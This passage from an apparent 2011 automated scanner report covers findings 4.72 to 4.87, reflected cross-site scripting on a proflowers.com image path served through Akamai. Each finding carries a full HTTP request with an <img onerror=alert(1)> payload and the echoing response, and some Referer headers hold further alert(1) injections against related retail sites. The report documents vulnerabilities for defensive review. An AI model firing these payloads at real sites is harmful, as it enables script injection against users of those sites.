HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:34 GMT
Connection: close

Unable to find /ProvideCommerce/Mdaycard10_ACe5c08<img src=a onerror=alert(1)>f66d8f8ae36
4.72. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7e221<img%20src%3da%20onerror%3dalert(1)>fb7298d04e was submitted in the REST URL parameter 9. This input was echoed as 7e221<img src=a onerror=alert(1)>fb7298d04e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ7e221<img%20src%3da%20onerror%3dalert(1)>fb7298d04e?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:13 GMT
Connection: close

Unable to find /ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ7e221<img src=a onerror=alert(1)>fb7298d04e
4.73. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2e51a<img%20src%3da%20onerror%3dalert(1)>f85c7e7ee4 was submitted in the REST URL parameter 9. This input was echoed as 2e51a<img src=a onerror=alert(1)>f85c7e7ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF2e51a<img%20src%3da%20onerror%3dalert(1)>f85c7e7ee4?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 112
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:58 GMT
Connection: close

Unable to find /ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF2e51a<img src=a onerror=alert(1)>f85c7e7ee4
4.74. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3eff6<img%20src%3da%20onerror%3dalert(1)>448fbcc17a4 was submitted in the REST URL parameter 9. This input was echoed as 3eff6<img src=a onerror=alert(1)>448fbcc17a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ3eff6<img%20src%3da%20onerror%3dalert(1)>448fbcc17a4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:29 GMT
Connection: close

Unable to find /ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ3eff6<img src=a onerror=alert(1)>448fbcc17a4
4.75. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 54ec7<img%20src%3da%20onerror%3dalert(1)>fe758beee42 was submitted in the REST URL parameter 9. This input was echoed as 54ec7<img src=a onerror=alert(1)>fe758beee42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF54ec7<img%20src%3da%20onerror%3dalert(1)>fe758beee42?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 116
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF54ec7<img src=a onerror=alert(1)>fe758beee42
4.76. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 87390<img%20src%3da%20onerror%3dalert(1)>6127ad3d4b was submitted in the REST URL parameter 9. This input was echoed as 87390<img src=a onerror=alert(1)>6127ad3d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF87390<img%20src%3da%20onerror%3dalert(1)>6127ad3d4b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:03 GMT
Connection: close

Unable to find /ProvideCommerce/ORC6indblpurpphal_blktin09_PF87390<img src=a onerror=alert(1)>6127ad3d4b
4.77. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 27412<img%20src%3da%20onerror%3dalert(1)>83ab8e888d1 was submitted in the REST URL parameter 9. This input was echoed as 27412<img src=a onerror=alert(1)>83ab8e888d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF27412<img%20src%3da%20onerror%3dalert(1)>83ab8e888d1?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:05 GMT
Connection: close

Unable to find /ProvideCommerce/ORC6indblwhtphal_willow09_PF27412<img src=a onerror=alert(1)>83ab8e888d1
4.78. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 136d7<img%20src%3da%20onerror%3dalert(1)>f39e388d55c was submitted in the REST URL parameter 9. This input was echoed as 136d7<img src=a onerror=alert(1)>f39e388d55c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l136d7<img%20src%3da%20onerror%3dalert(1)>f39e388d55c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/ORC6inphaltilandsia_curn09_l136d7<img src=a onerror=alert(1)>f39e388d55c
4.79. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3e66c<img%20src%3da%20onerror%3dalert(1)>e0bdb592a3a was submitted in the REST URL parameter 9. This input was echoed as 3e66c<img src=a onerror=alert(1)>e0bdb592a3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF3e66c<img%20src%3da%20onerror%3dalert(1)>e0bdb592a3a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/ORCbromgrdnblk07_PF3e66c<img src=a onerror=alert(1)>e0bdb592a3a
4.80. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a3ae1<img%20src%3da%20onerror%3dalert(1)>81037f6294b was submitted in the REST URL parameter 9. This input was echoed as a3ae1<img src=a onerror=alert(1)>81037f6294b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PFa3ae1<img%20src%3da%20onerror%3dalert(1)>81037f6294b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:01 GMT
Connection: close

Unable to find /ProvideCommerce/ORCdblbromgardn09_PFa3ae1<img src=a onerror=alert(1)>81037f6294b
4.81. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2ac5a<img%20src%3da%20onerror%3dalert(1)>380fac3babc was submitted in the REST URL parameter 9. This input was echoed as 2ac5a<img src=a onerror=alert(1)>380fac3babc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF2ac5a<img%20src%3da%20onerror%3dalert(1)>380fac3babc?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:05 GMT
Connection: close

Unable to find /ProvideCommerce/ORCdblkalblktin08_2_PF2ac5a<img src=a onerror=alert(1)>380fac3babc
4.82. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 56e55<img%20src%3da%20onerror%3dalert(1)>02759dc1b02 was submitted in the REST URL parameter 9. This input was echoed as 56e55<img src=a onerror=alert(1)>02759dc1b02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF56e55<img%20src%3da%20onerror%3dalert(1)>02759dc1b02?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 120
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF56e55<img src=a onerror=alert(1)>02759dc1b02
4.83. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f29c8<img%20src%3da%20onerror%3dalert(1)>5ffa66e876e was submitted in the REST URL parameter 9. This input was echoed as f29c8<img src=a onerror=alert(1)>5ffa66e876e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PFf29c8<img%20src%3da%20onerror%3dalert(1)>5ffa66e876e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:07 GMT
Connection: close

Unable to find /ProvideCommerce/ORCwhtphalylwbrom07_PFf29c8<img src=a onerror=alert(1)>5ffa66e876e
4.84. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d4bb1<img%20src%3da%20onerror%3dalert(1)>e7af5ef796 was submitted in the REST URL parameter 9. This input was echoed as d4bb1<img src=a onerror=alert(1)>e7af5ef796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339bd4bb1<img%20src%3da%20onerror%3dalert(1)>e7af5ef796?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:31 GMT
Connection: close

Unable to find /ProvideCommerce/P0026339bd4bb1<img src=a onerror=alert(1)>e7af5ef796
4.85. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a8f1a<img%20src%3da%20onerror%3dalert(1)>e4b9939c645 was submitted in the REST URL parameter 9. This input was echoed as a8f1a<img src=a onerror=alert(1)>e4b9939c645 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189ba8f1a<img%20src%3da%20onerror%3dalert(1)>e4b9939c645?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:25 GMT
Connection: close

Unable to find /ProvideCommerce/P0049189ba8f1a<img src=a onerror=alert(1)>e4b9939c645
4.86. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 953c7<img%20src%3da%20onerror%3dalert(1)>d73bd45dd2 was submitted in the REST URL parameter 9. This input was echoed as 953c7<img src=a onerror=alert(1)>d73bd45dd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b953c7<img%20src%3da%20onerror%3dalert(1)>d73bd45dd2?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:25 GMT
Connection: close

Unable to find /ProvideCommerce/P0054324b953c7<img src=a onerror=alert(1)>d73bd45dd2
4.87. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c4c9f<img%20src%3da%20onerror%3dalert(1)>f3daf93728a was submitted in the REST URL parameter 9. This input was echoed as c4c9f<img src=a onerror=alert(1)>f3daf93728a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

